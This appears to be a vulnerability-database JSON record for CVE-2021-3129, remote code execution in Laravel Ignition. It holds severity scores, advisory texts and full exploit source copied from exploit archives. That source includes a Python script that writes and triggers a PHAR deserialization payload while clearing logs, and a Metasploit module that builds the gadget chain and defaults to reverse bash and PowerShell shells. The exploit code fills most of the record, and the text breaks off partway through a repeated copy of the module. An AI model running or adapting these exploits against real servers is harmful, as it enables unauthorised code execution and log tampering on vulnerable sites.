"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-22T14:27:29", "type": "githubexploit", "title": "Exploit for Improper Authentication in Th-Wildau Covid-19 Contact Tracing", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33840", "CVE-2021-33831", "CVE-2021-3129"], "modified": "2021-09-01T08:02:36", "id": "7407E081-4DB0-50D7-AC00-42DC86BACF6D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-05-01T23:35:51", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). 
This is exploitable on sites using debug mode with Laravel before 8.4.2.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-3129", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-01-21T00:00:00", "id": "AKB:5E9429E0-21B2-448F-8137-A7FDE1EA5C48", "href": "https://attackerkb.com/topics/KP6wETuZyw/cve-2021-3129", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2022-04-27T17:34:40", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). 
This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T20:23:46", "type": "github", "title": "Unauthenticated remote code execution in Ignition", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-17T18:03:08", "id": "GHSA-4QWP-7C67-JMCC", "href": "https://github.com/advisories/GHSA-4qwp-7c67-jmcc", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-10-12T23:18:34", "description": "Ignition versions prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). 
This is exploitable on sites using debug mode with Laravel versions prior to 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-07T00:00:00", "type": "zdt", "title": "Ignition 2.5.1 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2021-04-07T00:00:00", "id": "1337DAY-ID-36079", "href": "https://0day.today/exploit/description/36079", "sourceData": "# Exploit Title: Laravel debug mode Remote Code Execution (Ignition <= 2.5.1)\r\n# Exploit Author: Tobias Marcotto\r\n# Tested on: Kali Linux x64\r\n# Version: < 2.5.1\r\n# Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). 
This is exploitable on sites using debug mode with Laravel before 8.4.2.\r\n# CVE : CVE-2021-3129\r\n\r\n\r\n*********************************************************************************************************\r\n\r\n\r\n#!/usr/bin/env python3.7\r\n\r\nimport base64\r\nimport re\r\nimport sys\r\nfrom dataclasses import dataclass\r\n\r\nimport requests\r\n\r\n\r\n@dataclass\r\nclass Exploit:\r\n session: requests.Session\r\n url: str\r\n payload: bytes\r\n log_path: str\r\n\r\n def main(self):\r\n if not self.log_path:\r\n self.log_path = self.get_log_path()\r\n \r\n try:\r\n self.clear_logs()\r\n self.put_payload()\r\n self.convert_to_phar()\r\n self.run_phar()\r\n finally:\r\n self.clear_logs()\r\n\r\n def success(self, message, *args):\r\n print('+ ' + message.format(*args))\r\n\r\n def failure(self, message, *args):\r\n print('- ' + message.format(*args))\r\n exit()\r\n\r\n def get_log_path(self):\r\n r = self.run_wrapper('DOESNOTEXIST')\r\n match = re.search(r'\"file\":\"(\\\\/[^\"]+?)\\\\/vendor\\\\/[^\"]+?\"', r.text)\r\n if not match:\r\n self.failure('Unable to find full path')\r\n path = match.group(1).replace('\\\\/', '/')\r\n path = f'{path}/storage/logs/laravel.log'\r\n r = self.run_wrapper(path)\r\n if r.status_code != 200:\r\n self.failure('Log file does not exist: {}', path)\r\n\r\n self.success('Log file: {}', path)\r\n return path\r\n \r\n def clear_logs(self):\r\n wrapper = f'php://filter/read=consumed/resource={self.log_path}'\r\n self.run_wrapper(wrapper)\r\n self.success('Logs cleared')\r\n return True\r\n\r\n def get_write_filter(self):\r\n filters = '|'.join((\r\n 'convert.quoted-printable-decode',\r\n 'convert.iconv.utf-16le.utf-8',\r\n 'convert.base64-decode'\r\n ))\r\n return f'php://filter/write={filters}/resource={self.log_path}'\r\n\r\n def run_wrapper(self, wrapper):\r\n solution = \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\"\r\n return self.session.post(\r\n self.url + 
'/_ignition/execute-solution/',\r\n json={\r\n \"solution\": solution,\r\n \"parameters\": {\r\n \"viewFile\": wrapper,\r\n \"variableName\": \"doesnotexist\"\r\n }\r\n }\r\n )\r\n\r\n def put_payload(self):\r\n payload = self.generate_payload()\r\n # This garanties the total log size is even\r\n self.run_wrapper(payload)\r\n self.run_wrapper('AA')\r\n\r\n def generate_payload(self):\r\n payload = self.payload\r\n payload = base64.b64encode(payload).decode().rstrip('=')\r\n payload = ''.join(c + '=00' for c in payload)\r\n # The payload gets displayed twice: use an additional '=00' so that\r\n # the second one does not have the same word alignment\r\n return 'A' * 100 + payload + '=00'\r\n\r\n def convert_to_phar(self):\r\n wrapper = self.get_write_filter()\r\n r = self.run_wrapper(wrapper)\r\n if r.status_code == 200:\r\n self.success('Successfully converted to PHAR !')\r\n else:\r\n self.failure('Convertion to PHAR failed (try again ?)')\r\n\r\n def run_phar(self):\r\n wrapper = f'phar://{self.log_path}/test.txt'\r\n r = self.run_wrapper(wrapper)\r\n if r.status_code != 500:\r\n self.failure('Deserialisation failed ?!!')\r\n self.success('Phar deserialized')\r\n # We might be able to read the output of system, but if we can't, it's ok\r\n match = re.search('^(.*?)\\n<!doctype html>\\n<html class=\"', r.text, flags=re.S)\r\n\r\n if match:\r\n print('--------------------------')\r\n print(match.group(1))\r\n print('--------------------------')\r\n elif 'phar error: write operations' in r.text:\r\n print('Exploit succeeded')\r\n else:\r\n print('Done')\r\n\r\n\r\ndef main(url, payload, log_path=None):\r\n payload = open(payload, 'rb').read()\r\n session = requests.Session()\r\n #session.proxies = {'http': 'localhost:8080'}\r\n exploit = Exploit(session, url.rstrip('/'), payload, log_path)\r\n exploit.main()\r\n\r\n\r\nif len(sys.argv) <= 1:\r\n print(\r\n f'Usage: {sys.argv[0]} <url> </path/to/exploit.phar> [log_file_path]\\n'\r\n '\\n'\r\n 'Generate your PHAR using 
PHPGGC, and add the --fast-destruct flag if '\r\n 'you want to see your command\\'s result. The Monolog/RCE1 GC works fine.\\n\\n'\r\n 'Example:\\n'\r\n ' $ php -d\\'phar.readonly=0\\' ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id\\n'\r\n ' $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar\\n'\r\n )\r\n exit()\r\n\r\nmain(sys.argv[1], sys.argv[2], (len(sys.argv) > 3 and sys.argv[3] or None))\n\n# 0day.today [2021-10-13] #", "sourceHref": "https://0day.today/exploit/36079", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-17T09:37:10", "description": "Ignition versions prior to 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-17T00:00:00", "type": "zdt", "title": "Ignition Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-3129"], "modified": "2022-02-17T00:00:00", "id": "1337DAY-ID-37366", "href": "https://0day.today/exploit/description/37366", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Unauthenticated remote code execution in Ignition',\n 'Description' => %q{\n Ignition before 2.5.2, as used in Laravel and other products,\n allows unauthenticated remote attackers to execute arbitrary code\n because of insecure usage of file_get_contents() and file_put_contents().\n This is exploitable on sites using debug mode with Laravel before 8.4.2.\n },\n 'Author' => [\n 'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging\n 'ambionics' # discovered\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2021-3129'],\n ['URL', 'https://www.ambionics.io/blog/laravel-debug-rce']\n ],\n 'DisclosureDate' => '2021-01-13',\n 'Platform' => %w[unix linux macos win],\n 'Targets' => [\n [\n 'Unix (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ],\n [\n 'Windows (In-Memory)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }\n }\n ]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']),\n OptString.new('LOGFILE', [false, 'Laravel log file absolute path'])\n ])\n 
end\n\n def check\n print_status(\"Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'method' => 'PUT'\n }, 1)\n # Check whether it is using facade/ignition\n # If is using it should respond method not allowed\n # checking if debug mode is enable\n if res && res.code == 405 && res.body.match(/label:\"(Debug)\"/)\n vprint_status 'Debug mode is enabled.'\n # check version\n versions = JSON.parse(\n res.body.match(/.+\"report\":(\\{.*),\"exception_class/).captures.first.gsub(/$/, '}')\n )\n version = Rex::Version.new(versions['framework_version'])\n vprint_status \"Found PHP #{versions['language_version']} running Laravel #{version}\"\n # to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid)\n # but it is way more intrusive than just checking the version moreover we would need to call\n # the find_log_file method before, meaning four requests more.\n return Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1')\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n @logfile = datastore['LOGFILE'] || find_log_file\n fail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile\n\n clear_log\n put_payload\n convert_to_phar\n run_phar\n\n handler\n\n clear_log\n end\n\n def find_log_file\n vprint_status 'Trying to detect log file'\n res = post Rex::Text.rand_text_alpha_upper(12)\n if res.code == 500 && res.body.match(%r{\"file\":\"(\\\\/[^\"]+?)/vendor\\\\/[^\"]+?})\n logpath = Regexp.last_match(1).gsub(/\\\\/, '')\n vprint_status \"Found directory candidate #{logpath}\"\n logfile = \"#{logpath}/storage/logs/laravel.log\"\n vprint_status \"Checking if #{logfile} exists\"\n res = post logfile\n if res.code == 200\n vprint_status \"Found log file #{logfile}\"\n return logfile\n end\n vprint_error \"Log file does not exist #{logfile}\"\n return\n 
end\n vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually'\n return\n end\n\n def clear_log\n res = post \"php://filter/read=consumed/resource=#{@logfile}\"\n # guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true)\n fail_with(Failure::UnexpectedReply, \"Log file #{@logfile} doesn't seem to exist.\") unless res.code == 200\n end\n\n def put_payload\n post format_payload\n post Rex::Text.rand_text_alpha_upper(2)\n end\n\n def convert_to_phar\n filters = %w[\n convert.quoted-printable-decode\n convert.iconv.utf-16le.utf-8\n convert.base64-decode\n ].join('|')\n\n post \"php://filter/write=#{filters}/resource=#{@logfile}\"\n end\n\n def run_phar\n post \"phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt\"\n # resp.body.match(%r{^(.*)\\n<!doctype html>})\n # $1 ? print_good($1) : nil\n end\n\n def body_template(data)\n {\n solution: 'Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution',\n parameters: {\n viewFile: data,\n variableName: Rex::Text.rand_text_alpha_lower(4..12)\n }\n }.to_json\n end\n\n def post(data)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'method' => 'POST',\n 'data' => body_template(data),\n 'ctype' => 'application/json',\n 'headers' => {\n 'Accept' => '*/*',\n 'Accept-Encoding' => 'gzip, deflate'\n }\n })\n end\n\n def generate_phar(pop)\n file = Rex::Text.rand_text_alpha_lower(8)\n stub = \"<?php __HALT_COMPILER(); ?>\\r\\n\"\n file_contents = Rex::Text.rand_text_alpha_lower(20)\n file_crc32 = Zlib.crc32(file_contents) & 0xffffffff\n manifest_len = 40 + pop.length + file.length\n phar = stub\n phar << [manifest_len].pack('V') # length of manifest in bytes\n phar << [0x1].pack('V') # number of files in the phar\n phar << [0x11].pack('v') # api version of the phar manifest\n phar << [0x10000].pack('V') # global phar bitmapped flags\n phar << [0x0].pack('V') # length of phar alias\n phar << [pop.length].pack('V') # 
length of phar metadata\n phar << pop # pop chain\n phar << [file.length].pack('V') # length of filename in the archive\n phar << file # filename\n phar << [file_contents.length].pack('V') # length of the uncompressed file contents\n phar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970.\n phar << [file_contents.length].pack('V') # length of the compressed file contents\n phar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents\n phar << [0x1b6].pack('V') # bit-mapped file-specific flags\n phar << [0x0].pack('V') # serialized File Meta-data length\n phar << file_contents # serialized File Meta-data\n phar << [Rex::Text.sha1(phar)].pack('H*') # signature\n phar << [0x2].pack('V') # signiture type\n phar << 'GBMB' # signature presence\n\n return phar\n end\n\n def format_payload\n # rubocop:disable Style/StringLiterals\n serialize = \"a:2:{i:7;O:31:\\\"GuzzleHttp\\\\Cookie\\\\FileCookieJar\\\"\"\n serialize << \":1:{S:41:\\\"\\\\00GuzzleHttp\\\\5cCookie\\\\5cFileCookieJar\\\\00filename\\\";\"\n serialize << \"O:38:\\\"Illuminate\\\\Validation\\\\Rules\\\\RequiredIf\\\"\"\n serialize << \":1:{S:9:\\\"condition\\\";a:2:{i:0;O:20:\\\"PhpOption\\\\LazyOption\\\"\"\n serialize << \":2:{S:30:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00callback\\\";\"\n serialize << \"S:6:\\\"system\\\";S:31:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00arguments\\\";\"\n serialize << \"a:1:{i:0;S:#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}}i:1;S:3:\\\"get\\\";}}}i:7;i:7;}\"\n # rubocop:enable Style/StringLiterals\n phar = generate_phar(serialize)\n\n b64_gadget = Base64.strict_encode64(phar).gsub('=', '')\n payload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join\n\n return Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00'\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37366", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:02:18", "description": "Ignition before 
2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T15:15:00", "type": "cve", "title": "CVE-2021-3129", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-22T10:15:00", "cpe": [], "id": "CVE-2021-3129", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3129", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-04-06T14:45:06", "description": "", "cvss3": {}, "published": "2021-04-06T00:00:00", "type": "packetstorm", "title": "Ignition 2.5.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3129"], "modified": "2021-04-06T00:00:00", "id": "PACKETSTORM:162094", "href": "https://packetstormsecurity.com/files/162094/Ignition-2.5.1-Remote-Code-Execution.html", 
"sourceData": "`# Exploit Title: Laravel debug mode Remote Code Execution (Ignition <= 2.5.1) \n# Date: 05/04/2021 \n# Exploit Author: Tobias Marcotto \n# Tested on: Kali Linux x64 \n# Version: < 2.5.1 \n# Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. \n# CVE : CVE-2021-3129 \n \n \n********************************************************************************************************* \n \n \n#!/usr/bin/env python3.7 \n \nimport base64 \nimport re \nimport sys \nfrom dataclasses import dataclass \n \nimport requests \n \n \n@dataclass \nclass Exploit: \nsession: requests.Session \nurl: str \npayload: bytes \nlog_path: str \n \ndef main(self): \nif not self.log_path: \nself.log_path = self.get_log_path() \n \ntry: \nself.clear_logs() \nself.put_payload() \nself.convert_to_phar() \nself.run_phar() \nfinally: \nself.clear_logs() \n \ndef success(self, message, *args): \nprint('+ ' + message.format(*args)) \n \ndef failure(self, message, *args): \nprint('- ' + message.format(*args)) \nexit() \n \ndef get_log_path(self): \nr = self.run_wrapper('DOESNOTEXIST') \nmatch = re.search(r'\"file\":\"(\\\\/[^\"]+?)\\\\/vendor\\\\/[^\"]+?\"', r.text) \nif not match: \nself.failure('Unable to find full path') \npath = match.group(1).replace('\\\\/', '/') \npath = f'{path}/storage/logs/laravel.log' \nr = self.run_wrapper(path) \nif r.status_code != 200: \nself.failure('Log file does not exist: {}', path) \n \nself.success('Log file: {}', path) \nreturn path \n \ndef clear_logs(self): \nwrapper = f'php://filter/read=consumed/resource={self.log_path}' \nself.run_wrapper(wrapper) \nself.success('Logs cleared') \nreturn True \n \ndef get_write_filter(self): \nfilters = '|'.join(( \n'convert.quoted-printable-decode', 
\n'convert.iconv.utf-16le.utf-8', \n'convert.base64-decode' \n)) \nreturn f'php://filter/write={filters}/resource={self.log_path}' \n \ndef run_wrapper(self, wrapper): \nsolution = \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\" \nreturn self.session.post( \nself.url + '/_ignition/execute-solution/', \njson={ \n\"solution\": solution, \n\"parameters\": { \n\"viewFile\": wrapper, \n\"variableName\": \"doesnotexist\" \n} \n} \n) \n \ndef put_payload(self): \npayload = self.generate_payload() \n# This garanties the total log size is even \nself.run_wrapper(payload) \nself.run_wrapper('AA') \n \ndef generate_payload(self): \npayload = self.payload \npayload = base64.b64encode(payload).decode().rstrip('=') \npayload = ''.join(c + '=00' for c in payload) \n# The payload gets displayed twice: use an additional '=00' so that \n# the second one does not have the same word alignment \nreturn 'A' * 100 + payload + '=00' \n \ndef convert_to_phar(self): \nwrapper = self.get_write_filter() \nr = self.run_wrapper(wrapper) \nif r.status_code == 200: \nself.success('Successfully converted to PHAR !') \nelse: \nself.failure('Convertion to PHAR failed (try again ?)') \n \ndef run_phar(self): \nwrapper = f'phar://{self.log_path}/test.txt' \nr = self.run_wrapper(wrapper) \nif r.status_code != 500: \nself.failure('Deserialisation failed ?!!') \nself.success('Phar deserialized') \n# We might be able to read the output of system, but if we can't, it's ok \nmatch = re.search('^(.*?)\\n<!doctype html>\\n<html class=\"', r.text, flags=re.S) \n \nif match: \nprint('--------------------------') \nprint(match.group(1)) \nprint('--------------------------') \nelif 'phar error: write operations' in r.text: \nprint('Exploit succeeded') \nelse: \nprint('Done') \n \n \ndef main(url, payload, log_path=None): \npayload = open(payload, 'rb').read() \nsession = requests.Session() \n#session.proxies = {'http': 'localhost:8080'} \nexploit = Exploit(session, url.rstrip('/'), 
payload, log_path) \nexploit.main() \n \n \nif len(sys.argv) <= 1: \nprint( \nf'Usage: {sys.argv[0]} <url> </path/to/exploit.phar> [log_file_path]\\n' \n'\\n' \n'Generate your PHAR using PHPGGC, and add the --fast-destruct flag if ' \n'you want to see your command\\'s result. The Monolog/RCE1 GC works fine.\\n\\n' \n'Example:\\n' \n' $ php -d\\'phar.readonly=0\\' ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id\\n' \n' $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar\\n' \n) \nexit() \n \nmain(sys.argv[1], sys.argv[2], (len(sys.argv) > 3 and sys.argv[3] or None)) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162094/ignition251-exec.txt"}, {"lastseen": "2022-02-16T17:22:18", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-16T00:00:00", "type": "packetstorm", "title": "Ignition Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-16T00:00:00", "id": "PACKETSTORM:165999", "href": 
"https://packetstormsecurity.com/files/165999/Ignition-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Unauthenticated remote code execution in Ignition', \n'Description' => %q{ \nIgnition before 2.5.2, as used in Laravel and other products, \nallows unauthenticated remote attackers to execute arbitrary code \nbecause of insecure usage of file_get_contents() and file_put_contents(). \nThis is exploitable on sites using debug mode with Laravel before 8.4.2. \n}, \n'Author' => [ \n'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging \n'ambionics' # discovered \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2021-3129'], \n['URL', 'https://www.ambionics.io/blog/laravel-debug-rce'] \n], \n'DisclosureDate' => '2021-01-13', \n'Platform' => %w[unix linux macos win], \n'Targets' => [ \n[ \n'Unix (In-Memory)', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } \n} \n], \n[ \n'Windows (In-Memory)', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_CMD, \n'Type' => :win_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' } \n} \n] \n], \n'Privileged' => false, 